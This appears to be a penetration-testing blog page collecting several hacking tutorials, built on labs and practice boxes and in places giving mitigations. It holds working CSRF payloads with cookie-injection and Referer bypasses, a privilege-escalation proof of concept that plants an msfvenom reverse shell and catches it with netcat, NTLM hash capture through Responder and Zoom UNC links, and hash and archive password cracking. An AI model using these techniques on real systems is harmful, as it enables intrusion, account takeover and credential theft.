Exploiting Cross Site Request Forgery (CSRF) & Bypassing Defenses

Posted on July 2, 2020December 4, 2020 by Harley

Wondering what Cross Site Request Forgery is? Go check out my previous post on this topic at Let’s Talk Basics About Cross Site Request Forgery (CSRF).

Ready to learn more about how to exploit it? You’re in the right place. The concepts and examples shown in this post were taken from PortSwigger’s WebSecurity Academy.

Table of Contents

What areas in a webapp do you look to exploit with CSRF?
What are some basic bypass techniques?
What about some more advanced bypass techniques?
- Tokens Tied to Non-Session Cookie
- “Double Submit” CSRF Token method.
- Referer Validation Dependent on Present Referer Header
- Referer Validation Only Checks if Domain Name is Present

What areas in a webapp do you look to exploit with CSRF?

Anywhere there might be a PUT request on the back-end. You are able to exploit this with a GET request as well, but the odds of finding this in the wild are very small as most devs know better by now.

Check the account page and see if a password change/reset might be vulnerable.
Perhaps a place where you can input your own email to send a recovery link?
Then I start looking for input fields to input XSS as they are sometimes chainable. For example, if an admin can post on a message board, but nobody else can, perhaps we can use XSRF to post a XSS payload on the message board for us.

What are some basic bypass techniques?

Since most mitigation techniques have to do with placing a unique token, bypassing this token requirement may be simple if they do not implement good validation on the other side.

What happens if we delete the value within the token parameter?
What happens if we delete the entire parameter including the value?
What happens if we replace the existing token with one of a different value that has the same length?
What happens if we convert our POST request into a GET request?Some applications correctly validate the token when the request uses the POST method but skip the validation when the GET method is used.

Basic Exploit Code:

When there are no defenses in play, or one of the defense methods listed above, it is relatively easy to exploit CSRF using a simple HTML template. Obviously you’ll want to replace the placeholders with the accurate values. Host this code up on your exploit server and wait for the victim to browse to the page:

<form method="$method" action="$url">
     <input type="hidden" name="$param1name" value="$param1value">
</form>
<script>
      document.forms[0].submit();
</script>

What about some more advanced bypass techniques?

I get it, you’re over the basics and you’re up against a target that has some more difficult protections in place. Let’s up our game a bit, shall we?

Bypassing CSRF Protections: Tokens Tied to Non-Session Cookie

Some applications tie the CSRF token to a cookie, but not to the same cookie that is used to track sessions. This can easily occur when an application employs two different frameworks, one for session handling and one for CSRF protection, which are not integrated together.

This situation is harder to exploit but is still vulnerable. If the web site contains any behavior that allows an attacker to set a cookie in a victim’s browser, then an attack is possible. The attacker can log in to the application using their own account, obtain a valid token and associated cookie, leverage the cookie-setting behavior to place their cookie into the victim’s browser, and feed their token to the victim in their CSRF attack.

Proof of Concept:

In our example, we have two different user accounts to sign in with. We’ll first log in as the username Wiener and issue a “Change Email” request. Let’s take a look at a legitimate request first and observe that the webserver responds with a 302 message.

Notice how modifying the session cookie will return an Unauthorized error, indicating that we’ve been signed out.

However, modifying the csrfKey cookie returns a “Invalid CSRF Token” message. This suggests that the csrfKey cookie may not be strictly tied to the session.

To prove our theory, let’s spin up a incognito window and sign in with a 2nd user account. Let’s issue a legitimate “Change Email” request, but lets swap the csrfKey cookie and csrf parameter from the first account to the second account.

We see that the request went through with a successful 302 response. If proper validation was in place, the csrfKey cookie would be tied to the session cookie, causing this example to be rejected. But because it isn’t, this means we can generate a valid CSRF cookie/param pair, and then pass those to our victim’s session during the attack.

Exploit Code:

To exploit this vulnerability, we need to be able to inject both a cookie that we control, along with a parameter. The parameter is easy, since we can just issue that as part of our CSRF request. The cookie is more challenging, because we need a way to inject a csrfKey cookie with a value that we control into the victim’s browser. Luckily for us, our example site’s search feature allows us to inject cookies. How do we know? When we perform a search, we see that the response sets a cookie named “LastSearchTerm”, which contains the value of our last search term.

Note: Notice how the above screenshot also shows the search feature has no CSRF protections. If it had, we wouldn’t be able to inject cookies using this method.

Now we can create a URL that contains the following. Notice how when URL decoded, it clearly sets a cookie named “csrfKey” with whatever value we choose.

/?search=test%0d%0aSet-Cookie:%20csrfKey=your-key

The full payload looks like this. Line 5 includes our cookie injection that will create a csrf cookie with a valid value that pairs with the csrf parameter in Line 3.

<form method="POST" action="https://ac1a1faf1f72be7c80d80d67002b00c9.web-security-academy.net/email/change-email">
     <input type="hidden" name="email" value="hacked@hax.com">
     <input type="hidden" name="csrf" value="AtwwO8ZSKpgUrBEkqBMIieJrCACVavFz">
</form>
 <img src="https://ac1a1faf1f72be7c80d80d67002b00c9.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=65EfxxiuOkDcp12bXTGK9eAMzxfGFasr " onerror="document.forms[0].submit()">

Bypassing CSRF Protections: “Double Submit” CSRF Token method.

Some applications do not maintain any server-side record of tokens that have been issued, but instead duplicate each token within a cookie and a request parameter. When the subsequent request is validated, the application simply verifies that the token submitted in the request parameter matches the value submitted in the cookie. This is sometimes called the “double submit” defense against CSRF, and is advocated because it is simple to implement and avoids the need for any server-side state.

Example of vulnerable request:

POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Cookie: session=1DQGdzYbOJQzLP7460tfyiv3do7MjyPw; csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa

csrf=R8ov2YBfTYmzFyjit8o2hKBuoIjXXVpa&email=wiener@normal-user.com

In the above request, it’s important to notice how the csrf session token matches the csrf parameter. When a “double submit” vulnerability exists, we simply need to inject a cookie that matches whatever csrf parameter we’re going to forge as well.

Exploit code:

In our example, the search feature on the vulnerable website allows the ability for us to inject a cookie of our choosing within the victim’s browser. Line 5 shows us injecting a csrf cookie with a value of fake. Line 3 shows us also forging a request with paramater csrf containing a matching value of fake.

<form method="POST" action="https://acb31f821e84332a809da51f00d200ce.web-security-academy.net/email/change-email">
     <input type="hidden" name="email" value="hax@hacked.com">
     <input type="hidden" name="csrf" value="fake">
</form>
<img src=" https://acb31f821e84332a809da51f00d200ce.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake " onerror="document.forms[0].submit();"/>

The end result is we’re able to update the users email to be hax@hacked.com by bypassing the “double submit” CSRF mitigation technique.

Bypassing CSRF Protections: Referer Validation Dependent on Present Referer Header

Aside from defenses that employ CSRF tokens, some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application’s own domain. Some applications validate the Referer header when it is present in requests but skip the validation if the header is omitted. What were to happen if we were to delete the referer header from the request?

Proof of concept:

In the following example, the “Change Email” forum validates the Referer header when present to ensure the request originated from the same domain. This is what a legitimate request looks like.

Notice how the validation kicks in and will reject the request when we modify the Referer header to originate from a different domain, such as fake.com.

However, deleting the Referer header in its entirety allows the request to go through.

Exploit code:

Line 4 includes the bypass to strip out the Referer header from our request.

<form method="POST" action="https://ac891f331edd33ed8007ab8500750000.web-security-academy.net/email/change-email">
     <input type="hidden" name="email" value="hacked@hax.com">
</form>
     <meta name="referrer" content="no-referrer">

Bypassing CSRF Protections: Referer Validation Only Checks if Domain Name is Present

Some applications validate the Referer header in a naive way that can be bypassed. For example, if the application simply validates that the Referer contains its own domain name, then the attacker can place the required value elsewhere in the URL.

Proof of concept:

Like before, we see that a legitimate request from the website returns a valid 302 response.

Also like before, modifying the Referer header to contain a domain name that differs from the legitimate one will force the server to reject the request.

However, we’re able to get a successful 302 response by simply adding web-security-academy.net as a subdomain to fake.com.

Exploit Code:

Line 5 contains the piece that allows us to modify what URL and Referer the response comes from.

<form method="POST" action="https://acc01f071ff796db8098277e00a00038.web-security-academy.net/email/change-email">
     <input type="hidden" name="email" value="hacked@hax.com">
</form>
<script>
      history.pushState("", "", "/?https://acc01f071ff796db8098277e00a00038.web-security-academy.net.fake.com/email") 
      document.forms[0].submit();
</script>

Hacking Tutorial

Abusing Local Privilege Escalation Vulnerability in Liongard ROAR <1.9.76

Posted on May 18, 2020May 19, 2020 by Harley

Liongard ROAR is an automated documentation system that collects daily snapshots of configuration data for cloud, network, and on-premise systems.

In April 2020, a local privilege escalation vulnerability was discovered that would allow an attacker the ability to modify executables placed on a system by the RoarAgent installer. Should those executables be modified to contain specific exploit code, an attacker would be able to leverage this to escalate their privileges to the same user context used by the RoarAgent service.

This guide intends to serve as a proof-of-concept, and will not go into detail on bypassing antivirus or other security measures.

Table of Contents:

Setting the Stage
Preparing the Payload
Transferring the Payload
Performing the Attack
Mitigation

Setting the Stage

Before we begin, it is important to note that this is a privilege escalation exploit. This assumes that an attacker already has access to the system that they wish to exploit, and this will not work without access to the machine with at least a low-level user account.

Note: ROAR is typically installed on a Domain Controller. Since most Domain Controllers do not usually allow low-level users access to the system, an argument can be made that this vulnerability is low severity. However, it is important to note that ROAR can be installed on non-Domain Controller systems as well.

The vulnerability exists due to the way the installer assigns security permissions to the files within the following directory:

C:\Program Files (x86)\LiongardInc\RoarAgent

Reviewing the files at this directory reveals that all executables have Full Control assigned to Everyone.

No matter what user we’re logged in as, we have the ability to Modify this file. What were to happen if we were to place a malicious executable with the name RoarAgentSVC.exe in this directory, overwrite the existing file, and restart the Roar Agent service?

This particular file that we’re observing in the above screenshot is the executable that runs when the Roar Agent service is started within services.msc.

This service runs within a specific user context as specified by the administrator when installing the software. According to Liongard’s documentation, they suggest using a Domain Admin for the Log On As user.

Preparing the Payload

Spin up a Kali instance, and let’s start by generating a quick EXE payload. If you haven’t already, check out my MSFVenom Cheatsheet where I share the command I’m about to use, along with many others that may come in handy for you in the future.

sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Obviously you’ll want to replace LHOST and LPORT with the appropriate value for your environment.

Transferring the Payload

With our payload ready, we need to transfer it to the target machine. There are a number of ways to do this, but I’ll simply encode this file in Base64 format since it’s not very large.

base64 -w0 shell-x64.exe

We can then copy results to our clipboard.

And paste it into a text file on our target machine. I’ll create a new text document called RoarAgentSVC.b64 and store the contents there.

With the contents of our Base64 payload on the machine, we need to decode it, and overwrite the RoarAgentSVC.exe executable. I’m going to rename RoarAgentSVC.exe to RoarAgentSVC.bak so we can easily revert our changes once finished.

We can now leverage CertUtil decode the contents of our Base64 encoded file.

certutil -decode RoarAgentSVC.b64 RoarAgentSVC.exe

Performing the Attack

We now have everything in place. If the user we’re logged in as does not have permission to restart the service or issue a reboot, we simply have to wait for a maintenance window to occur. The next time the Roar Agent service gets executed, so should our malicous payload which should trigger a reverse shell back to our attacking machine.

To make sure we catch the reverse shell, let’s spin up a netcat listener.

sudo nc -nvlp 443

For sake of demonstration, we will restart the service on the victim machine.

Which then executes our payload, and sends us a reverse shell.

A quick whoami and net user command(s) shows us what user context we’re running as.

Mitigation

Option A: Patching

The easiest mitigation strategy is to upgrade your version of Liongard ROAR to 1.9.76 or greater. Liongard’s official documentation on this topic can be found at https://docs.liongard.com/docs/critical-security-patch-2020-04-24

Option B: Principle of Lease Privilege

Consider reviewing what user-context your Roar service runs in. Had we had the service run with Domain-Admin rights in our example, or even local admin privileges on a domain controller, an attacker could leverage this vulnerability to gain access across an entire enterprise with a single attack.

You have to dig for it a bit in their documentation, but you can find details on creating a non-domain admin service account.

Hacking Tutorial

How to Crack Encrypted 7z Archives

Posted on April 29, 2020June 21, 2022 by Harley

Encrypt Your Internet Connection for as Little as $3/mo with PIA VPN Learn more

Disclaimer: This content is intended to be consumed by cyber security professionals, ethical hackers, and penetration testers. Any attacks performed in this video should only be performed in environments that you control or have explicit permission to perform them on.

This post is a continuation from my last regarding cracking encrypted .zip archives. But what happens if you come across an encrypted 7zip archive? The 7-Zip encryption is actually quite good and can require a lot of time to bruteforce, but this guide will show you how weak passwords can still break good encryption.

I’ll use LightWeight from HackTheBox as an example for this guide. Please note that this post does not intend to serve as a walkthrough for the box.

To begin, we already have the archive we wish to crack on our filesystem. Our goal is to crack the file named backup.7z.

We try to open the archive using 7z, but we’re prompted for a password that we do not know. When prompted, I entered password in the example below, but that did not work.

7z x backup.7z

We can start by using zip2john, but we find that the tool is unable to obtain the hash.

To proceed, we’ll need a tool called 7z2john. If you get an error when trying to run this tool, you may need to install the following package.

sudo apt install libcompress-raw-lzma-perl -y

With that package installed, let’s locate 7z2john and copy the full path.

Now let’s run this tool against backup.7z.

/usr/share/john/7z2john.pl backup.7z

Nice! We’ve extracted the hash. I’m just going to rerun the command again and output the results into a file named lightweight7z.hash

/usr/share/john/7z2john.pl backup.7z > lightweight7z.hash

Now let’s vi the file so we can remove the first bit. With the cursor at the top, I’m going to enter 10x while still in command mode so that I delete the first 10 characters. We should be left with only the hash now. To write my changes and quit, I’ll enter :wq

With the hash in hand, we’re ready to pass the hard work over to hashcat. First, we need to identify what numeric value hashcat assigns to 7-zip archives. Let’s run hashcat --example-hashes and search the results for 7-Zip. We find that we’ll need mode 11600

As long as you have a wordlist ready, let’s throw this at hashcat!

hashcat -m 11600 lightweight7z.hash /usr/share/wordlists/rockyou.txt

After some time, we see that our password is cracked. The credential appears to be delete.

Let’s test this by running 7z x backup.7z again, but entering delete when prompted for the credential.

Now we see the archived .php files available to us in our present working directory!

That’s it! Super quick and easy to crack this if you have a weak password. While the 7-zip encryption is actually quite good and can make a password very difficult to crack, weak passwords will end up harming you in the end.

Hacking Tutorial

Performing DNS Zone Transfers & Viewing the Results w/ Aquatone

Posted on April 23, 2020May 1, 2020 by Harley

When you find that DNS is running on a box, you may want to check if it’s vulnerable to a DNS Zone Transfer. If it is, and you’re able to successfully perform the attack, it will return a list of all subdomains available on the server — making the enumeration process that much easier.

Table of Contents:

Background
Performing the DNS Zone Transfer Attack
Formatting the Results
Viewing the Results w/ Aquatone

In this guide, we will use the Hack The Box machine named FriendZone as an example. Note: This document is not intended to be a walkthrough of the box.

Background

At this point, we have already found the following information about the target machine.

DNS is running on TCP Port 53.
Machine located at 10.10.10.123.
We’ve found two domain names already; friendzoneportal.red & friendzone.red

Performing the DNS Zone Transfer Attack

Let’s start by attempting a zone transfer on our first domain name with a tool called dig.

sudo dig axfr @10.10.10.123 friendzoneportal.red

Let’s check the other domain name too.

sudo dig axfr @10.10.10.123 friendzone.red

Comparing the results of both, looks like each returns a different list of results. Let’s rerun each command, but add >> zonetransfer to the end of the commands so that we can create a new file called zonetransfer and append the results to it.

sudo dig axfr @10.10.10.123 friendzone.red >> zonetransfer
sudo dig axfr @10.10.10.123 friendzoneportal.red >> zonetransfer

Formatting the Results

Let’s do some magic to strip out everything we don’t care about and output the results to a file named hosts.

cat zonetransfer | grep friendzone | grep IN | awk '{print $1}' | sed 's/\.$//g' | sort -u > hosts

Nice! The goal is to place these domain names into our /etc/hosts file, which requires each host being separated by a space rather than a new line. Let’s use vi to perform a find & replace. Open the file by running vi hosts.

While in command mode, let’s run the following commands to find all new lines, replace them with a space. :%s/\n/ /g

Press Enter to run the above command. Confirm your file looks like the screenshot below, and then run the following command to write the results to a new file named tmp. :w tmp

Run :q! to exit the file and then we can cat the contents of tmp to ensure things worked correctly.

Viewing the Results w/ Aquatone

Go ahead and copy out the contents of tmp. With those domain names in your clipboard, let’s update our /etc/hosts file.

sudo vi /etc/hosts

Add a new line to the file to include the hostnames at the IP address 10.10.10.123.

Now, we want to edit our list of hosts (not the /etc/hosts file) to append http:// at the beginning of each line. There’s many ways to do this, but we’ll use a vi macro to speed up the process for us. Go ahead and run the command vi hosts to open the file in command mode.

Press qa to start recording a macro. You should be able to see the footer change to recording @a.

We’ll still be in command mode, so we want to press i to enter insert mode.

Then, we can type http:// to the first line. Press the Down Arrow key, and then press the Home key. If you do this correctly, you’ll be taken to the 2nd line where you want the http:// text to show up.

We’re done recording our macro, so press the Esc key to exit insert mode and go back to command mode, and then press q to stop recording the macro. The footer showing recording @a should no longer be present.

With our macro recorded, let’s run it by pressing @a within command mode.

So that ran it once, but we have seven additional lines to run it on. Let’s type 7@a to run it seven times.

Nice! Now let’s run :wq to write our changes and quit, and then cat the file to review the results.

Now we have a list of all the websites we want to view! Luckily there is a tool that can go out to each of these websites for us, let us know if the page is active, and even take a screenshot of it so we don’t have to open each one manually. This tool is called Aquatone, and you can find the precompiled binary from GitHub.

One you have the binary download, extracted, and on your system, you may want to move it to /bin so that you can execute it from anywhere.

With Aquatone on our system, let’s make a new directory to store our loot, move our hosts file (containing our targets) into, change into it ourselves, and then run the tool.

mkdir aquatone
mv hosts aquatone/ cd aquatone/ cat hosts | aquatone

The output of the command shows us which domains return pages, and which ones don’t — but the real beauty of this tool is in the generated html file. Let’s open up the report and see what we can find.

firefox aquatone_report.html

Here we can easily see which pages are live and even get a sneak peak into what they’re running to know which ones we may be interested in.

Hacking Tutorial

Abusing LLMNR/NBT-NS in Active Directory Domains: Part 2 (Cracking NTLMv2 Hashes w/ Hashcat)

Posted on April 16, 2020October 15, 2022 by Harley

Other Parts in Series:

In my first guide in this series, I showed you how to capture NTLMv2 hashes by utilizing a tool called Responder.py. You can find that here.

In this guide, I will show you how to crack those hashes using a tool called Hashcat. Hashcat works best when you run it locally on your host machine, meaning not within a Virtual Machine. For that reason, I will show you how to set things up in Windows.

Table of Contents:

Capturing the NTLMv2 Hashes
Preparing Hashcat in Windows
Cracking NTLMv2 Hashes w/ Hashcat: Dictionary Attack
Cracking NTLMv2 Hashes w/ Hashcat: Brute-Force (Mask) Attack
Restoring a Hashcat Session

Capturing the NTLMv2 Hashes

As we covered previously in Part One, I was able to capture the Net-NTLMv2 hashes for multiple users in the domain.

Once captured, the hashes will be stored inside the Responder/logs directory. You can use the following commands to extract unique hashes and store them into a file named ntlm-hashes.txt.

for user in `strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'`
do
echo "[*] search for: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done

Let’s take these hashes and store them into a text file titled hashes.txt. Since I’m going to crack these hashes from my local machine (running Windows), I’ll create the text file there.

With hashes in hand, let’s go out and grab the tool we need to crack them!

Preparing Hashcat in Windows

Open up Google and search for Hashcat Windows. You should be taken to https://hashcat.net/hashcat/

Locate the latest Binary and click on Download.

Navigate to your downloads and Extract the contents of the file.
Note: You will need 7-Zip installed.

I like to Cut and Paste this extracted folder to my C:\ drive & then Rename it to make it easier to access.

I also like to rename the hashcat64.exe file to just hashcat.exe so I don’t have to remember to specify 64, but this is totally up to you.

You’ll want to make sure you have a Wordlist available on your filesystem. You don’t have to store it within the Hashcat folder, but doing so will make your command a bit easier when we’re ready to run the tool.

I transferred rockyou.txt from my Kali box and pasted that into the c:\hashcat\ folder

Let’s also make sure our captured hashes.txt are in this location.

Cracking NTLMv2 Hashes w/ Hashcat: Dictionary Attack

If you’ve never used Hashcat before, I’d highly recommend checking out their website or reading up on the help output.

For our use case, this is the command that we’re going to run.

hashcat.exe -a 0 -m 5600 hashes.txt rockyou.txt -o cracked.txt -O

So what does this do? Let’s break it down.

-a is for the attack type. 0 is used to specify we’re performing a dictionary attack.
-m is used to specify what type of hashes we’re looking to crack. Hashcat supports cracking dozens of different hash-types, so you’ll typically want to refer to their help documentation to know exactly which number to use. In our case, NTLMv2 hashes are represented by 5600
hashes.txt is a positional parameter. Hashcat expects you to place the name of the file containing your hashes first, which is what we’re doing here.
rockyou.txt is another positional parameter. Hashcat expects the name of the file that you wish to use for your dictionary attack.
-o is used to specify an output file. This is where we’d like the cracked passwords to be stored. If you don’t specify this flag, cracked passwords will be stored in a file called hashcat.potfile, which can be found in the hashcat directory.
-O is used to optimize the attack for the hardware running in our system. You may not need to use this.

Now that we understand the command, let’s change into our hashcat directory and see if we can crack our hashes! Open up a Command Prompt window and enter the following commands:

cd c:\hashcat hashcat.exe -a 0 -m 5600 hashes.txt rockyou.txt -o cracked.txt -O

Depending on your system, it may take a few minutes for the wordlist to be exhausted. Eventually, you should be able to view the results and see how many (if any) hashes were “Recovered”. In my case, we were able to recover two out of the three passwords.

Let’s view the contents of our output file.

type cracked.txt

The results show us two users part of the NBA domain, along with their associated credentials.

nba\kIrving:Password123
nba\lJames:P@55w0rd

Cracking NTLMv2 Hashes w/ Hashcat: Brute-Force (Mask) Attack

So what about that third password? Well we could continue to try a dictionary attack w/ other wordlists, but if the password is short, we should be able to brute-force it fairly quick. Let’s give this a shot by revisiting the command we used before, but make a couple slight changes.

hashcat.exe -a 3 -m 5600 hashes.txt -1 ?l?d?u ?1?1?1?1?1?1?1 -o cracked.txt -O

Did you notice what’s different? We changed -a to 3 instead of 0. This specifies that we’re looking to brute-force the password instead of perform a dictionary attack.

We also dropped the rockyou.txt wordlist since we no longer need it and replaced it with -1 ?l?d?u ?1?1?1?1?1?1?1. Why did we do this? I’d highly recommend reviewing Hashcat’s documentation on mask attacks, but let’s try to understand this by breaking it into two parts.

Explaining -1 ?l?d?u
-1 is used to define a custom character-set with a value of ?1. Within ?1, we’re storing the following:

?l is used to specify all lowercase letters in the alphabet.
?d is used to specify all number digits.
?u is used to specify all uppercase letters in the alphabet.

Explaining ?1?1?1?1?1?1?1
Now that ?1 is defined, we’re going to specify it seven times to indicate that we’re looking to crack a seven character password that could contain a lowercase/uppercase/number in any/all positions.

Okay, let’s run the command now and see what happens.

Eventually we’ll crack this password and be able to view it within our cracked.txt file as well.

Restoring a Hashcat Session

Since brute-force jobs can take a long time to process, it’s important to know about the --restore option. By default, Hashcat will store your job in a session that you can call on later. You can resume your interrupted session by running the following command:

hashcat.exe --restore

There’s a ton more information about Hashcat checkpoints in a blog post found over at https://miloserdov.org/?p=2089, but the above command may be the most useful if you’re just looking to recover from an unexpected closed session.

That’s it for this one! By now, you should know how to capture and crack weak credentials by simply having access to an Active Directory environment. But what happens when we’re unable to crack these passwords? Stay tuned for Part 3 to discuss NLTMv2-Relay attacks!

Hacking Tutorial

Abusing Zoom Webinar/Meeting Software to Steal Windows Credentials

Posted on April 1, 2020April 2, 2020 by Harley

A vulnerability exists within Zoom with the way that it handles UNC paths in its chat feature. UNC (Universal Naming Convention) paths are used by computer systems to reference network resources and typically look like the following:

\\computer\share

As you can see from the above text, this path is listed out in this blog post as text, but isn’t a clickable link. The vulnerability that exists in Zoom is the fact that these paths are clickable links that will automatically attempt to take users that click on them to the share, whether it exists or not.

Why is this a problem? Most webinars/meetings in Zoom will allow all attendees to type in the chat. This would allow a nefarious actor to place a malicious UNC path into the chat and direct users to interact with it.

The exploit we’re going to use isn’t new. In fact, I’ve already written about it in a previous blog post! I highly recommend that you check it out, as I’m not going to go as in depth as I did in that post; Abusing LLMNR/NBT-NS in Active Directory Domains: Part 1 (Capturing NTLMv2 Hashes).

Table of Contents:

Performing the attack
But wait.. You need local network access?
Mitigation Strategies

Performing the attack

To begin, let’s ensure our Responder tool is configured with all servers on.

sudo gedit /opt/Responder/Responder.conf

With all servers active, let’s go ahead and Run Responder on our primary interface (note yours may differ depending on your environment).
sudo python Responder.py -I eth0

So what’s happening here? Responder.py is listening for all incoming requests in the three listed Poisoners (LLMNR, NBT-NS, DNS/MDNS).

Why does this matter? Computers will send their username & passwords (in hashed format) to any SMB shares when trying to connect. They do this by design so that the SMB server can determine whether or not the user is allowed to access this share.

What do we need to do? Now we just need a way to get machines to reach out and request to connect to a server of ours, such as an SMB share. If only there was a way to share a clickable link to a SMB share with multiple users all at once.. Enter Zoom!

From within a Zoom webinar/meeting, let’s go ahead and place a UNC path to see the vulnerability in action.

As you can see, the path lights up and is clickable. With Responder.py running on our attacking machine, let’s go ahead and click the link from the victim machine. Clicking the link from the victim machine doesn’t appear to do anything at all, but let’s check the output of our Responder.py window..

Check it out, we’ve got a NTLMv2 hash along with its username. From here, we could utilize additional tools to relay this hash to other machines on the network or even crack it to obtain the password in clear-text. Tutorials on these topics are coming in the future.

Note: This above example is abusing LLMNR in the network in order for Responder.py to receive the request. This is because the share \\infinitelogins\share doesn’t actually exist. If LLMNR is disabled in the network, a UNC path that directly points to the attacking machine is necessary.

But wait.. You need local network access?

Everything I’ve shown you up to this point DOES require that your attacking machine is on the same local network as the victims. With that said, it is possible to leverage this same technique to have machines connect to a publically routable address that is running Responder.py (assuming that SMB is allowed out of your network and over your internet provider).

Mitigation Strategies

Don’t allow everybody to chat within Zoom. You should be able to limit chat capabilities to specific users of panelists-only. If a UNC share can’t be shared, the exploit can’t take place.

Perform egress filtering on port 445. If outbound SMB requests are denied in your network, or at the gateway, Responder.py will never see the request come in and will never ask for the machine’s NTLM credentials.

Educate users. User awareness training will help prevent attacks like this along with other common phishing techniques. If users know what not to click on, they won’t click.

Disable LLMNR/NBT-NS. You should really just disable LLMNR in your network for a number of reasons, but this won’t prevent the attack if the UNC path provided in the chat points directly to the attacking box. It will stop the attack if the share entered within the chat window doesn’t exist however.

Hacking Tutorial

How To Crack Encrypted ZIP Archives

Posted on March 23, 2020December 16, 2020 by Harley

Thanks for checking out another quick hacking tutorial! This one is super simple, but helpful to know in case you come across a password protected ZIP archive that you need access to.

To start, I created a couple text files on my Windows machine and stored them into an encrypted ZIP archive using 7-zip.

Let’s transfer over the CrackMe.zip file to our Kali machine.

Once the CrackMe.zip file is present on the filesystem, go ahead and Right-Click and select Extract Here.

You’ll get a prompt stating that there is a Password Required.

In order for us to crack this password, we need to first extract its hash. Luckily, John The Ripper has everything we need built-in. Let’s spin up a Terminal window and get started. Start by making sure you’re in the correct directory that contains the ZIP file.

Run the following command to decrypt any hashes that are contained within the archive. This will create a new text document titled hash-to-crack.txt

sudo zip2john CrackMe.zip > hash-to-crack.txt

We can verify the contents of the file by utilizing cat.

cat hash-to-crack.txt

Great! Now that we have a hash contained in the text document, let’s try our hand at cracking it. First, we’ll need a wordlist. I always like to utilize the rockyou.txt wordlist built into Kali first. This list can be found at /usr/share/wordlists/rockyou.txt. If you haven’t first unzipped this list, you’ll want to do that before proceeding. Check out this guide for help with that.

With wordlist in hand, let’s run the following command to start our brute-force.

sudo john hash-to-crack.txt --wordlist=/usr/share/wordlists/rockyou.txt

If you receive an error, you may need to specify the format the hash is in.

sudo john --format=zip hash-to-crack.txt --wordlist=/usr/share/wordlists/rockyou.txt

Based on the result above, we see that our password is password123! Let’s attempt to extract the archive again, and enter that password to make sure it works.

Doing so creates a new folder titled CrackMe. Let’s go ahead and expand the contents of this and see what we can find!

That’s it! Super quick and easy to crack this if you have a weak password. As you’ve heard 1000 times, strong passwords are essential for keeping your data secure, and this is just one example that proves that.

Hacking Tutorial

How To Route Tools (Gobuster) Through a BurpSuite Proxy

Posted on March 20, 2020October 9, 2020 by Harley

There are times where you will need to troubleshoot or route your tools through a proxy in order to get the result you need. This post will serve as a general guide for configuring BurpSuite as a proxy so you can route tools through it easily, and troubleshoot things as needed.

In this specific example, we showcase how to route Gobuster through Burpsuite so we can analyze traffic.

Table of Contents:

Identifying the Problem
Configuring Proxy in BurpSuite
Testing the Proxy

Identifying the Problem

On HackTheBox, there is a box called Node where you can’t use Gobuster for enumeration. When you’re able to analyze requests through a tool like Burpsuite, you can identify this early on and save a ton of time by dodging a rabbit hole.

Note: This is NOT a write-up on Node. We will not be resolving the problem of enumerating Node using Gobuster, but instead will simply use Node as an example for this blog post.

Node lives at 10.10.10.58, and has a webserver listening on port 3000. Let’s start by browsing to that webpage to see what we get once we’re connected to the HackTheBox VPN.

http://10.10.10.58:3000

Anytime I see a webpage, I always like to start Gobuster to try and enumerate any directories that may be living under the hood. Let’s give that a shot.

gobuster dir -u http://10.10.10.58:3000 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Very quickly we get a response back that states “Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.58:3000/febbf4ec-069f-4b87-a671-a07ses, specify the ‘–wildcard’ switch“

Specifying the --wildcard switch as it suggests in this case will just cause every page to report back with a 200 status code. Not very helpful.

gobuster dir -u http://10.10.10.58:3000 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt --wildcard

Configuring Proxy in BurpSuite

Let’s spin up BurpSuite and navigate to the Proxy tab. Let’s then go into Options, and Add a new proxy listener.

In the Binding tab, enter a Port that you’d like to use. In this case, I’ll just use 8081.

Click on the Request Handling tab. Fill out as needed.

Redirect to host: Enter the host that you wish to send traffic to. I’ll be sending my traffic to 10.10.10.58
Redirect to port: Enter the port that the host is listening on. In my case, it will be 3000.
Force use of TLS: That is not necessary in my example, but it may be a requirement for you depending on your use-case.
Support Invisible Proxying: N/A

Click OK.

The add listener screen should close, and you should be taken to the Proxy Listeners table with a new entry shown. Make sure that your new listener is Running.

Testing the Proxy

Now, let’s open a browser and see what happens when we browse to localhost on the port we specified earlier.

http://localhost:8081

Great! We know our proxy is working and we’re able to route traffic through BurpSuite. Let’s do the same, but with Gobuster this time.

gobuster dir -u http://localhost:8081 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

We notice that we are still getting the same error message. Let’s see if we can analyze this traffic within BurpSuite and identify why. Let’s head back into Burp and select the Proxy tab. Turn Intercept On.

Let’s run the same Gobuster command again. You’ll notice the tool will spin up, but then appear to hang.

gobuster dir -u http://localhost:8081 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Heading back to Burp, we have a chance to modify the request if we desire. I will go ahead and click Forward. You may need to click it a few times if multiple requests are being sent.

Gobuster still reports the same error as before, but now we have a chance to go into the HTTP History within Burp. From here, we can review the Response received from the webserver and have a chance to troubleshoot.

This proves that we are routing fully through Burp, and now have a chance to utilize some of its features while running our tools.

That’s it for this post! Again, the goal was to learn how to route tools through BurpSuite so that you can leverage all of its features. Let me know if this is at all helpful, or if there is more that you’d like me to add.

Hacking Tutorial, Pentesting

How to Brute Force Websites & Online Forms Using Hydra

Posted on February 22, 2020July 29, 2021 by Harley

Encrypt and Anonymize Your Internet Connection for as Little as $3/mo with PIA VPN. Learn M ore

While working through NINEVAH on HackTheBack (Write-Up on this coming in a future post), I came across a couple web forms that I needed to break into. In my opinion, using the Intruder feature within BurpSuite is an easier way to run brute-force attacks, but the effectiveness of the tool is greatly reduced when using the free community version. Instead of dealing with slow brute-force attempts, I decided to give Hydra a try.

What we’re breaking into

If you’re unfamiliar with https://hackthebox.eu, I highly recommend checking them out. Click here to check out my HackTheBox related content.

